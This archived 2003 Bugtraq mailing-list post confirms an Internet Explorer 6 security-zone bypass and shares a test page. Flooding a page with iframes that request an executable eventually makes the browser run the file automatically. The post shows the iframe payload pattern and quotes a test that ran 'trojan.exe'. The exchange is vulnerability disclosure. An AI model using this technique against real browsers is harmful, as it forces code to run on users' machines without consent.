Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! - UPDATED
From: "http-equiv () excite com" <1 () malware com>
Date: Thu, 15 May 2003 21:05:54 -0000



Marek,

Further to my confirmation of seeing this in the past as detailed 
below, I am today delighted to inform you that I can reconfirm that 
it functions precisely as you describe:

1. Definitely processor related as after 10 minutes of bogging down 
the machine, BANG ! it automatically opened the .exe

2.  Thereon after, all following .exe's are also automatically opened

Tested on the following page which is nothing more than a sh!tload of:
 
<iframe src="fooware.exe">'s

Harmless .exe

http://www.malware.com/forceframe.html

Note: may of course be different on other machines [i.e. processor 
power...increase amount of frame 'suppose]

Well Done ! It's a beauty !


======
I had sent this to bugtraq when you initially posted it, confirming 
having seen it in the past as well. Will try your html file and see 
if can get it up and running again.

Forwarded From: "http-equiv () excite com" 

<!-- 

I've noticed that on my test environment it is possible to bypass 
InternetExplorer Zones protection by flooding it with large number 
of 
file://requests in example to infected fileserver. The result of 
this 
bypass isEXECUTION OF ANY REQUESTED FILE. My requested file 
was 'trojan.exe' placedon neighbour WIN2K Professional workstation. 
To see code used during the test check files in attached archive.

On IE 6.0 the result was always the same, after more than 200 
dialog 
boxes with 'trojan.exe' request, suddenly requested file got 
executed
 
-->

Excellent. Can confirm seeing this happen twice in the past two 
years. Both in Internet Explorer and Outlook Express, using an 
iframe 
and a remote executable on the server e.g. <iframe 
src="http://...../malware.exe";> multiple instances on one page. One 
slipped through and the file was executed automatically. 

Not been able to replicate since though. 

May be a combo machine power and 'confusing' IE [easier].


-- 
http://www.malware.com





-- 
http://www.malware.com





  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]